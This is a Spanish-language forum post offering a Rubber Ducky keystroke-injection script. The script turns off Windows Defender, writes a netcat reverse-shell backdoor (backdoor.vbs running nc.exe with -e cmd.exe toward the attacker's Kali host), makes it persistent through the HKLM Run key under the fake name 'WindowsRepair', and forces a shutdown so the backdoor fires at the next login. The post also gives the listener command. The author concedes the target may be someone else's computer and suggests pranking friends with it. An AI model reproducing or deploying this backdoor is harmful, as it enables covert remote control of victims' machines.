En este post vengo a traeros un script para Rubber Ducky que consiste en los siguientes "fragmentos":
· Desactivar Windows Defender desde Estrategias de grupo de Windows.
· Crear el siguiente script:
Código:
Set wshShell = WScript.CreateObject("wscript.shell")
Return = wshShell.Run("""C:\nc.exe"" laipdetukalilinux 8484 -e ""C:\WINDOWS\system32\cmd.exe""", 0, false)
· Crear un registro de auditoria en la ruta Equipo\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run para que ejecute el script al acceder al usuario.
· Mover desde un PENDRIVE el programa nc.exe al directorio que elijáis.
Lo que hará esce srcipt VBS es conectar al ordenador de la "víctima" a una IPv4 y un host con el programa NetCat (nc.exe), tu, desde la Terminal de kali linux, podrás acceder a la CMD del usuario de la "víctima".
·(Pongo víctima entre comillas porque este script yo lo uso por mero aprendizage y aburrimiento, pero esto es para hacerlo con 2 ordenadores, así que el otro ordenador o es tuyo, o es de alguien que quieras tener acceso a su CMD, y dudo que sea para hacer algo "ético", aunque si quieres trolear un poco a algún colega, está entretenido).
Bien, ahora que he explicado en que consiste el script VBS, explicaré el script de Rubber Ducky, el script que se ejecutará para hacer todo el proceso de la creación del script VBS y demás.
El script es el siguiente: (IGNORAD LOS GUIÓNES, SON PARA SEPARAR EN FRAGMENTOS CADA FUNCIÓN DEL SCRIPT, SI COPIÁIS Y PEGÁIS EL SCRIPT, NO OLVIDÉIS QUITAR LOS GUIÓNES Y CAMBIAR LOS DATOS DE LA VÍCITMA Y TUYOS, OSEA, DIRECTORIOS, IPS, DISCPS...)
Para ver el contenido, necesitas Iniciar sesión o Registrarte.
Voy a explicar cada fragmento del código:
Código:
DELAY 500
GUI d
DELAY 200
GUI r
DELAY 500
STRING gpedit.msc
ENTER
DELAY 500
STRING Pla
RIGHTARROW
DELAY 100
STRING Compo
RIGHTARROW
DELAY 100
STRING Antiv
RIGHTARROW
DELAY 500
TAB
RIGHTARROW
DELAY 500
STRING Desa
DELAY 100
ENTER
DELAY 400
STRING E
DELAY 200
ENTER
Código:
DELAY 1000
GUI d
DELAY 500
GUI r
DELAY 500
STRING cmd
DELAY 300
CTRL-SHIFT ENTER
DELAY 1000
LEFT
DELAY 1000
STRING cd/
ENTER
STRING copy con backdoor.vbs
ENTER
STRING Set wshShell = WScript.CreateObject("wscript.shell")
ENTER
STRING Return = wshShell.Run("""C:\nc.exe"" laipdetukalilinux 8484 -e ""C:\WINDOWS\system32\cmd.exe""", 0, false)
ENTER
CTRL C
DELAY 1000
Código:
STRING cd/
ENTER
DELAY 1000
STRING REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsRepair /t REG_SZ /d "C:\backdoor.vbs"
DELAY 1000
ENTER
Código:
DELAY 1000
STRING cls
ENTER
DELAY 1000
STRING E:
ENTER
STRING cd Netcat Backdoor
ENTER
STRING copy nc.exe "C:\"
ENTER
DELAY 2000
STRING shutdown -s -t 5
ENTER
Lo dicho, va al disco E: (o al que tu le hayas asignado) y moverá el programa nc.exe al disco C:, el programa nc.exe debe estar en una carpeta que se llame Netcat Backdoor (dentro del pendrive).
Por último apagará el ordenador para que la víctima tenga que encenderlo de nuevo y el script se ejecute.
Bien, una vez hecho todo esto, ahora toca entrar en acción, una vez que el rubberducky haya ejecutado el script entero (cuando se haya apagado el ordenador) iremos al a terminal de Kali Linux, y pondremos lo siguiente: nc -lvp 8484, le damos a ENTER, y lo dejamos así hasta que salga la CMD de la "víctima", la CMD os saldrá en la terminal cuando el ordenador donde está el script/virus se encienda (cuando inicie sesión en el usuario).
Este script de Rubber Ducky, lo que hace es automatizar este proceso:
El vídeo es de @Khea.
Cualquier duda ponedlo en los comentarios o habladme por MD.